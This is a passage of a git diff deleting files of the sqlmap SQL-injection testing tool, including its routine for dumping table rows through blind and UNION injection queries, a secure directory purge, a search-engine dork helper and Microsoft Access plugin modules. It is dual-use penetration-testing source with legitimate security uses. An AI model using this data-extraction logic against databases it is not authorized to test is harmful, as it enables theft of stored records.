'asymp': 8776, - 'ne': 8800, - 'equiv': 8801, - 'le': 8804, - 'ge': 8805, - 'sub': 8834, - 'sup': 8835, - 'nsub': 8836, - 'sube': 8838, - 'supe': 8839, - 'oplus': 8853, - 'otimes': 8855, - 'perp': 8869, - 'sdot': 8901, - 'lceil': 8968, - 'rceil': 8969, - 'lfloor': 8970, - 'rfloor': 8971, - 'lang': 9001, - 'rang': 9002, - 'loz': 9674, - 'spades': 9824, - 'clubs': 9827, - 'hearts': 9829, - 'diams': 9830, -} diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py deleted file mode 100644 index a511000e..00000000 --- a/lib/utils/pivotdumptable.py +++ /dev/null @@ -1,188 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from extra.safe2bin.safe2bin import safechardecode -from lib.core.agent import agent -from lib.core.bigarray import BigArray -from lib.core.common import Backend -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import singleTimeWarnMessage -from lib.core.common import unArrayizeValue -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import EXPECTED -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapNoneDataException -from lib.core.settings import MAX_INT -from lib.core.unescaper import unescaper -from lib.request import inject - -def pivotDumpTable(table, colList, count=None, blind=True): - lengths = {} - entries = {} - - dumpNode = queries[Backend.getIdentifiedDbms()].dump_table.blind - - validColumnList = False - validPivotValue = False - - if count is None: - query = dumpNode.count % table - query = whereQuery(query) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) - - if isinstance(count, basestring) and count.isdigit(): - count = int(count) - - if count == 0: - infoMsg = "table '%s' appears to be empty" % unsafeSQLIdentificatorNaming(table) - logger.info(infoMsg) - - for column in colList: - lengths[column] = len(column) - entries[column] = [] - - return entries, lengths - - elif not isNumPosStrValue(count): - return None - - for column in colList: - lengths[column] = 0 - entries[column] = BigArray() - - colList = filter(None, sorted(colList, key=lambda x: len(x) if x else MAX_INT)) - - if conf.pivotColumn: - for _ in colList: - if re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I): - infoMsg = "using column '%s' as a pivot " % conf.pivotColumn - infoMsg += "for retrieving row data" - logger.info(infoMsg) - - colList.remove(_) - colList.insert(0, _) - - validPivotValue = True - break - - if not validPivotValue: - warnMsg = "column '%s' not " % conf.pivotColumn - warnMsg += "found in table '%s'" % table - logger.warn(warnMsg) - - if not validPivotValue: - for column in colList: - infoMsg = "fetching number of distinct " - infoMsg += "values for column '%s'" % column - logger.info(infoMsg) - - query = dumpNode.count2 % (column, table) - query = whereQuery(query) - value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if isNumPosStrValue(value): - validColumnList = True - - if value == count: - infoMsg = "using column '%s' as a pivot " % column - infoMsg += "for retrieving row data" - logger.info(infoMsg) - - validPivotValue = True - colList.remove(column) - colList.insert(0, column) - break - - if not validColumnList: - errMsg = "all column name(s) provided are non-existent" - raise SqlmapNoneDataException(errMsg) - - if not validPivotValue: - warnMsg = "no proper pivot column provided (with unique values)." - warnMsg += " It won't be possible to retrieve all rows" - logger.warn(warnMsg) - - pivotValue = " " - breakRetrieval = False - - def _(column, pivotValue): - if column == colList[0]: - query = dumpNode.query.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) - else: - query = dumpNode.query2.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False)) - - query = whereQuery(query) - return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) - - try: - for i in xrange(count): - if breakRetrieval: - break - - for column in colList: - value = _(column, pivotValue) - if column == colList[0]: - if isNoneValue(value): - for pivotValue in filter(None, (" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, unichr(ord(pivotValue[0]) + 1))): - value = _(column, pivotValue) - if not isNoneValue(value): - break - - if isNoneValue(value): - breakRetrieval = True - break - pivotValue = safechardecode(value) - - if conf.limitStart or conf.limitStop: - if conf.limitStart and (i + 1) < conf.limitStart: - warnMsg = "skipping first %d pivot " % conf.limitStart - warnMsg += "point values" - singleTimeWarnMessage(warnMsg) - break - elif conf.limitStop and (i + 1) > conf.limitStop: - breakRetrieval = True - break - - value = "" if isNoneValue(value) else unArrayizeValue(value) - - lengths[column] = max(lengths[column], len(value) if value else 0) - entries[column].append(value) - - except KeyboardInterrupt: - warnMsg = "user aborted during enumeration. sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) - - except SqlmapConnectionException, e: - errMsg = "connection exception detected. sqlmap " - errMsg += "will display partial output" - errMsg += "'%s'" % e - logger.critical(errMsg) - - return entries, lengths - -def whereQuery(query): - if conf.dumpWhere and query: - prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "") - - if "%s)" % conf.tbl.upper() in prefix.upper(): - prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix) - elif re.search(r"(?i)\bWHERE\b", prefix): - prefix += " AND %s" % conf.dumpWhere - else: - prefix += " WHERE %s" % conf.dumpWhere - - query = "%s ORDER BY %s" % (prefix, suffix) if suffix else prefix - - return query diff --git a/lib/utils/progress.py b/lib/utils/progress.py deleted file mode 100644 index 06fe30f0..00000000 --- a/lib/utils/progress.py +++ /dev/null @@ -1,108 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import getUnicode -from lib.core.common import dataToStdout -from lib.core.data import conf -from lib.core.data import kb - -class ProgressBar(object): - """ - This class defines methods to update and draw a progress bar - """ - - def __init__(self, minValue=0, maxValue=10, totalWidth=None): - self._progBar = "[]" - self._oldProgBar = "" - self._min = int(minValue) - self._max = int(maxValue) - self._span = max(self._max - self._min, 0.001) - self._width = totalWidth if totalWidth else conf.progressWidth - self._amount = 0 - self._times = [] - self.update() - - def _convertSeconds(self, value): - seconds = value - minutes = seconds / 60 - seconds = seconds - (minutes * 60) - - return "%.2d:%.2d" % (minutes, seconds) - - def update(self, newAmount=0): - """ - This method updates the progress bar - """ - - if newAmount < self._min: - newAmount = self._min - elif newAmount > self._max: - newAmount = self._max - - self._amount = newAmount - - # Figure out the new percent done, round to an integer - diffFromMin = float(self._amount - self._min) - percentDone = (diffFromMin / float(self._span)) * 100.0 - percentDone = round(percentDone) - percentDone = min(100, int(percentDone)) - - # Figure out how many hash bars the percentage should be - allFull = self._width - len("100%% [] %s/%s ETA 00:00" % (self._max, self._max)) - numHashes = (percentDone / 100.0) * allFull - numHashes = int(round(numHashes)) - - # Build a progress bar with an arrow of equal signs - if numHashes == 0: - self._progBar = "[>%s]" % (" " * (allFull - 1)) - elif numHashes == allFull: - self._progBar = "[%s]" % ("=" * allFull) - else: - self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), - " " * (allFull - numHashes)) - - # Add the percentage at the beginning of the progress bar - percentString = getUnicode(percentDone) + "%" - self._progBar = "%s %s" % (percentString, self._progBar) - - def progress(self, deltaTime, newAmount): - """ - This method saves item delta time and shows updated progress bar with calculated eta - """ - - if len(self._times) <= ((self._max * 3) / 100) or newAmount > self._max: - eta = None - else: - midTime = sum(self._times) / len(self._times) - midTimeWithLatest = (midTime + deltaTime) / 2 - eta = midTimeWithLatest * (self._max - newAmount) - - self._times.append(deltaTime) - self.update(newAmount) - self.draw(eta) - - def draw(self, eta=None): - """ - This method draws the progress bar if it has changed - """ - - if self._progBar != self._oldProgBar: - self._oldProgBar = self._progBar - dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" ETA %s" % self._convertSeconds(int(eta))) if eta is not None else "")) - if self._amount >= self._max: - if not conf.liveTest: - dataToStdout("\r%s\r" % (" " * self._width)) - kb.prependFlag = False - else: - dataToStdout("\n") - - def __str__(self): - """ - This method returns the progress bar string - """ - - return getUnicode(self._progBar) diff --git a/lib/utils/purge.py b/lib/utils/purge.py deleted file mode 100644 index ee244ee6..00000000 --- a/lib/utils/purge.py +++ /dev/null @@ -1,83 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import random -import shutil -import stat -import string - -from lib.core.common import getSafeExString -from lib.core.data import logger - -def purge(directory): - """ - Safely removes content from a given directory - """ - - if not os.path.isdir(directory): - warnMsg = "skipping purging of directory '%s' as it does not exist" % directory - logger.warn(warnMsg) - return - - infoMsg = "purging content of directory '%s'..." % directory - logger.info(infoMsg) - - filepaths = [] - dirpaths = [] - - for rootpath, directories, filenames in os.walk(directory): - dirpaths.extend([os.path.abspath(os.path.join(rootpath, _)) for _ in directories]) - filepaths.extend([os.path.abspath(os.path.join(rootpath, _)) for _ in filenames]) - - logger.debug("changing file attributes") - for filepath in filepaths: - try: - os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE) - except: - pass - - logger.debug("writing random data to files") - for filepath in filepaths: - try: - filesize = os.path.getsize(filepath) - with open(filepath, "w+b") as f: - f.write("".join(chr(random.randint(0, 255)) for _ in xrange(filesize))) - except: - pass - - logger.debug("truncating files") - for filepath in filepaths: - try: - with open(filepath, 'w') as f: - pass - except: - pass - - logger.debug("renaming filenames to random values") - for filepath in filepaths: - try: - os.rename(filepath, os.path.join(os.path.dirname(filepath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) - except: - pass - - dirpaths.sort(cmp=lambda x, y: y.count(os.path.sep) - x.count(os.path.sep)) - - logger.debug("renaming directory names to random values") - for dirpath in dirpaths: - try: - os.rename(dirpath, os.path.join(os.path.dirname(dirpath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) - except: - pass - - logger.debug("deleting the whole directory tree") - os.chdir(os.path.join(directory, "..")) - - try: - shutil.rmtree(directory) - except OSError, ex: - logger.error("problem occurred while removing directory '%s' ('%s')" % (directory, getSafeExString(ex))) diff --git a/lib/utils/search.py b/lib/utils/search.py deleted file mode 100644 index 116b3cb0..00000000 --- a/lib/utils/search.py +++ /dev/null @@ -1,195 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cookielib -import httplib -import re -import socket -import urllib -import urllib2 - -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import popValue -from lib.core.common import pushValue -from lib.core.common import readInput -from lib.core.common import urlencode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import HTTP_HEADER -from lib.core.enums import REDIRECTION -from lib.core.exception import SqlmapBaseException -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapGenericException -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import DUMMY_SEARCH_USER_AGENT -from lib.core.settings import DUCKDUCKGO_REGEX -from lib.core.settings import DISCONNECT_SEARCH_REGEX -from lib.core.settings import GOOGLE_REGEX -from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE -from lib.core.settings import UNICODE_ENCODING -from lib.request.basic import decodePage -from lib.request.httpshandler import HTTPSHandler -from thirdparty.socks import socks - - -def _search(dork): - """ - This method performs the effective search on Google providing - the google dork and the Google session cookie - """ - - if not dork: - return None - - headers = {} - - headers[HTTP_HEADER.USER_AGENT] = dict(conf.httpHeaders).get(HTTP_HEADER.USER_AGENT, DUMMY_SEARCH_USER_AGENT) - headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE - - try: - req = urllib2.Request("https://www.google.com/ncr", headers=headers) - conn = urllib2.urlopen(req) - except Exception, ex: - errMsg = "unable to connect to Google ('%s')" % getSafeExString(ex) - raise SqlmapConnectionException(errMsg) - - gpage = conf.googlePage if conf.googlePage > 1 else 1 - logger.info("using search result page #%d" % gpage) - - url = "https://www.google.com/search?" - url += "q=%s&" % urlencode(dork, convall=True) - url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" - url += "&start=%d" % ((gpage - 1) * 100) - - try: - req = urllib2.Request(url, headers=headers) - conn = urllib2.urlopen(req) - - requestMsg = "HTTP request:\nGET %s" % url - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - - page = conn.read() - code = conn.code - status = conn.msg - responseHeaders = conn.info() - page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) - - responseMsg = "HTTP response (%s - %d):\n" % (status, code) - - if conf.verbose <= 4: - responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) - elif conf.verbose > 4: - responseMsg += "%s\n%s\n" % (responseHeaders, page) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - except urllib2.HTTPError, e: - try: - page = e.read() - except Exception, ex: - warnMsg = "problem occurred while trying to get " - warnMsg += "an error page information (%s)" % getSafeExString(ex) - logger.critical(warnMsg) - return None - except (urllib2.URLError, httplib.error, socket.error, socket.timeout, socks.ProxyError): - errMsg = "unable to connect to Google" - raise SqlmapConnectionException(errMsg) - - retVal = [urllib.unquote(match.group(1) or match.group(2)) for match in re.finditer(GOOGLE_REGEX, page, re.I)] - - if not retVal and "detected unusual traffic" in page: - warnMsg = "Google has detected 'unusual' traffic from " - warnMsg += "used IP address disabling further searches" - logger.warn(warnMsg) - - if not retVal: - message = "no usable links found. What do you want to do?" - message += "\n[1] (re)try with DuckDuckGo (default)" - message += "\n[2] (re)try with Disconnect Search" - message += "\n[3] quit" - choice = readInput(message, default="1").strip().upper() - - if choice == "Q": - raise SqlmapUserQuitException - elif choice == "2": - url = "https://search.disconnect.me/searchTerms/search?" - url += "start=nav&option=Web" - url += "&query=%s" % urlencode(dork, convall=True) - url += "&ses=Google&location_option=US" - url += "&nextDDG=%s" % urlencode("/search?q=%s&setmkt=en-US&setplang=en-us&setlang=en-us&first=%d&FORM=PORE" % (urlencode(dork, convall=True), (gpage - 1) * 10), convall=True) - url += "&sa=N&showIcons=false&filterIcons=none&js_enabled=1" - regex = DISCONNECT_SEARCH_REGEX - else: - url = "https://duckduckgo.com/d.js?" - url += "q=%s&p=%d&s=100" % (urlencode(dork, convall=True), gpage) - regex = DUCKDUCKGO_REGEX - - try: - req = urllib2.Request(url, headers=headers) - conn = urllib2.urlopen(req) - - requestMsg = "HTTP request:\nGET %s" % url - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - - page = conn.read() - code = conn.code - status = conn.msg - responseHeaders = conn.info() - page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) - - responseMsg = "HTTP response (%s - %d):\n" % (status, code) - - if conf.verbose <= 4: - responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) - elif conf.verbose > 4: - responseMsg += "%s\n%s\n" % (responseHeaders, page) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - except urllib2.HTTPError, e: - try: - page = e.read() - except socket.timeout: - warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code - logger.critical(warnMsg) - return None - except: - errMsg = "unable to connect" - raise SqlmapConnectionException(errMsg) - - retVal = [urllib.unquote(match.group(1)) for match in re.finditer(regex, page, re.I | re.S)] - - return retVal - -def search(dork): - pushValue(kb.redirectChoice) - kb.redirectChoice = REDIRECTION.YES - - try: - return _search(dork) - except SqlmapBaseException, ex: - if conf.proxyList: - logger.critical(getSafeExString(ex)) - - warnMsg = "changing proxy" - logger.warn(warnMsg) - - conf.proxy = None - - setHTTPHandlers() - return search(dork) - else: - raise - finally: - kb.redirectChoice = popValue() - -def setHTTPHandlers(): # Cross-linked function - raise NotImplementedError diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py deleted file mode 100644 index 66c4eaa4..00000000 --- a/lib/utils/sqlalchemy.py +++ /dev/null @@ -1,85 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import imp -import logging -import os -import sys -import warnings - -_sqlalchemy = None -try: - f, pathname, desc = imp.find_module("sqlalchemy", sys.path[1:]) - _ = imp.load_module("sqlalchemy", f, pathname, desc) - if hasattr(_, "dialects"): - _sqlalchemy = _ - warnings.simplefilter(action="ignore", category=_sqlalchemy.exc.SAWarning) -except ImportError: - pass - -try: - import MySQLdb # used by SQLAlchemy in case of MySQL - warnings.filterwarnings("error", category=MySQLdb.Warning) -except ImportError: - pass - -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapFilePathException -from plugins.generic.connector import Connector as GenericConnector - -class SQLAlchemy(GenericConnector): - def __init__(self, dialect=None): - GenericConnector.__init__(self) - self.dialect = dialect - - def connect(self): - if _sqlalchemy: - self.initConnection() - - try: - if not self.port and self.db: - if not os.path.exists(self.db): - raise SqlmapFilePathException, "the provided database file '%s' does not exist" % self.db - - _ = conf.direct.split("//", 1) - conf.direct = "%s////%s" % (_[0], os.path.abspath(self.db)) - - if self.dialect: - conf.direct = conf.direct.replace(conf.dbms, self.dialect, 1) - - engine = _sqlalchemy.create_engine(conf.direct, connect_args={'check_same_thread':False} if self.dialect == "sqlite" else {}) - self.connector = engine.connect() - except SqlmapFilePathException: - raise - except Exception, msg: - raise SqlmapConnectionException("SQLAlchemy connection issue ('%s')" % msg[0]) - - self.printConnected() - - def fetchall(self): - try: - retVal = [] - for row in self.cursor.fetchall(): - retVal.append(tuple(row)) - return retVal - except _sqlalchemy.exc.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg.message if hasattr(msg, "message") else msg) - return None - - def execute(self, query): - try: - self.cursor = self.connector.execute(query) - except (_sqlalchemy.exc.OperationalError, _sqlalchemy.exc.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg.message if hasattr(msg, "message") else msg) - except _sqlalchemy.exc.InternalError, msg: - raise SqlmapConnectionException(msg[1]) - - def select(self, query): - self.execute(query) - return self.fetchall() diff --git a/lib/utils/timeout.py b/lib/utils/timeout.py deleted file mode 100644 index 0e0a4f03..00000000 --- a/lib/utils/timeout.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import threading - -from lib.core.data import logger -from lib.core.enums import CUSTOM_LOGGING - -def timeout(func, args=(), kwargs={}, duration=1, default=None): - class InterruptableThread(threading.Thread): - def __init__(self): - threading.Thread.__init__(self) - self.result = None - - def run(self): - try: - self.result = func(*args, **kwargs) - except Exception, msg: - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, msg) - self.result = default - - thread = InterruptableThread() - thread.start() - thread.join(duration) - - if thread.isAlive(): - return default - else: - return thread.result diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py deleted file mode 100644 index 99764ff8..00000000 --- a/lib/utils/versioncheck.py +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import sys - -PYVERSION = sys.version.split()[0] - -if PYVERSION >= "3" or PYVERSION < "2.6": - exit("[CRITICAL] incompatible Python version detected ('%s'). For successfully running sqlmap you'll have to use version 2.6 or 2.7 (visit 'http://www.python.org/download/')" % PYVERSION) - -extensions = ("gzip", "ssl", "sqlite3", "zlib") -try: - for _ in extensions: - __import__(_) -except ImportError: - errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) - errMsg += "most probably because current version of Python has been " - errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')" - exit(errMsg) \ No newline at end of file diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py deleted file mode 100644 index ea05df1d..00000000 --- a/lib/utils/xrange.py +++ /dev/null @@ -1,87 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -class xrange(object): - """ - Advanced (re)implementation of xrange (supports slice/copy/etc.) - Reference: http://code.activestate.com/recipes/521885-a-pythonic-implementation-of-xrange/ - - >>> foobar = xrange(1, 10) - >>> 7 in foobar - True - >>> 11 in foobar - False - >>> foobar[0] - 1 - """ - - __slots__ = ['_slice'] - - def __init__(self, *args): - if args and isinstance(args[0], type(self)): - self._slice = slice(args[0].start, args[0].stop, args[0].step) - else: - self._slice = slice(*args) - if self._slice.stop is None: - raise TypeError("xrange stop must not be None") - - @property - def start(self): - if self._slice.start is not None: - return self._slice.start - return 0 - - @property - def stop(self): - return self._slice.stop - - @property - def step(self): - if self._slice.step is not None: - return self._slice.step - return 1 - - def __hash__(self): - return hash(self._slice) - - def __cmp__(self, other): - return (cmp(type(self), type(other)) or - cmp(self._slice, other._slice)) - - def __repr__(self): - return '%s(%r, %r, %r)' % (type(self).__name__, - self.start, self.stop, self.step) - - def __len__(self): - return self._len() - - def _len(self): - return max(0, int((self.stop - self.start) / self.step)) - - def __contains__(self, value): - return (self.start <= value < self.stop) and (value - self.start) % self.step == 0 - - def __getitem__(self, index): - if isinstance(index, slice): - start, stop, step = index.indices(self._len()) - return xrange(self._index(start), - self._index(stop), step*self.step) - elif isinstance(index, (int, long)): - if index < 0: - fixed_index = index + self._len() - else: - fixed_index = index - - if not 0 <= fixed_index < self._len(): - raise IndexError("Index %d out of %r" % (index, self)) - - return self._index(fixed_index) - else: - raise TypeError("xrange indices must be slices or integers") - - def _index(self, i): - return self.start + self.step * i diff --git a/plugins/__init__.py b/plugins/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/plugins/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/plugins/dbms/__init__.py b/plugins/dbms/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/plugins/dbms/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/plugins/dbms/access/__init__.py b/plugins/dbms/access/__init__.py deleted file mode 100644 index 4e8da68f..00000000 --- a/plugins/dbms/access/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import ACCESS_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.access.enumeration import Enumeration -from plugins.dbms.access.filesystem import Filesystem -from plugins.dbms.access.fingerprint import Fingerprint -from plugins.dbms.access.syntax import Syntax -from plugins.dbms.access.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class AccessMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines Microsoft Access methods - """ - - def __init__(self): - self.excludeDbsList = ACCESS_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.ACCESS] = Syntax.escape diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py deleted file mode 100644 index ce4e4016..00000000 --- a/plugins/dbms/access/connector.py +++ /dev/null @@ -1,70 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import pyodbc -except ImportError: - pass - -import logging - -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.core.settings import IS_WIN -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://pyodbc.googlecode.com/ - User guide: http://code.google.com/p/pyodbc/wiki/GettingStarted - API: http://code.google.com/p/pyodbc/w/list - Debian package: python-pyodbc - License: MIT - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - if not IS_WIN: - errMsg = "currently, direct connection to Microsoft Access database(s) " - errMsg += "is restricted to Windows platforms" - raise SqlmapUnsupportedFeatureException(errMsg) - - self.initConnection() - self.checkFileDb() - - try: - self.connector = pyodbc.connect('Driver={Microsoft Access Driver (*.mdb)};Dbq=%s;Uid=Admin;Pwd=;' % self.db) - except (pyodbc.Error, pyodbc.OperationalError), msg: - raise SqlmapConnectionException(msg[1]) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except pyodbc.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - return None - - def execute(self, query): - try: - self.cursor.execute(query) - except (pyodbc.OperationalError, pyodbc.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except pyodbc.Error, msg: - raise SqlmapConnectionException(msg[1]) - - self.connector.commit() - - def select(self, query): - self.execute(query) - return self.fetchall() diff --git a/plugins/dbms/access/enumeration.py b/plugins/dbms/access/enumeration.py deleted file mode 100644 index 9c7f5411..00000000 --- a/plugins/dbms/access/enumeration.py +++ /dev/null @@ -1,81 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import logger -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getBanner(self): - warnMsg = "on Microsoft Access it is not possible to get a banner" - logger.warn(warnMsg) - - return None - - def getCurrentUser(self): - warnMsg = "on Microsoft Access it is not possible to enumerate the current user" - logger.warn(warnMsg) - - def getCurrentDb(self): - warnMsg = "on Microsoft Access it is not possible to get name of the current database" - logger.warn(warnMsg) - - def isDba(self): - warnMsg = "on Microsoft Access it is not possible to test if current user is DBA" - logger.warn(warnMsg) - - def getUsers(self): - warnMsg = "on Microsoft Access it is not possible to enumerate the users" - logger.warn(warnMsg) - - return [] - - def getPasswordHashes(self): - warnMsg = "on Microsoft Access it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) - - return {} - - def getPrivileges(self, *args): - warnMsg = "on Microsoft Access it is not possible to enumerate the user privileges" - logger.warn(warnMsg) - - return {} - - def getDbs(self): - warnMsg = "on Microsoft Access it is not possible to enumerate databases (use only '--tables')" - logger.warn(warnMsg) - - return [] - - def searchDb(self): - warnMsg = "on Microsoft Access it is not possible to search databases" - logger.warn(warnMsg) - - return [] - - def searchTable(self): - warnMsg = "on Microsoft Access it is not possible to search tables" - logger.warn(warnMsg) - - return [] - - def searchColumn(self): - warnMsg = "on Microsoft Access it is not possible to search columns" - logger.warn(warnMsg) - - return [] - - def search(self): - warnMsg = "on Microsoft Access search option is not available" - logger.warn(warnMsg) - - def getHostname(self): - warnMsg = "on Microsoft Access it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/access/filesystem.py b/plugins/dbms/access/filesystem.py deleted file mode 100644 index 45f92b03..00000000 --- a/plugins/dbms/access/filesystem.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "on Microsoft Access it is not possible to read files" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on Microsoft Access it is not possible to write files" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py deleted file mode 100644 index 9ac4fd59..00000000 --- a/plugins/dbms/access/fingerprint.py +++ /dev/null @@ -1,191 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import getCurrentThreadData -from lib.core.common import randomStr -from lib.core.common import wasLastResponseDBMSError -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.session import setDbms -from lib.core.settings import ACCESS_ALIASES -from lib.core.settings import METADB_SUFFIX -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class 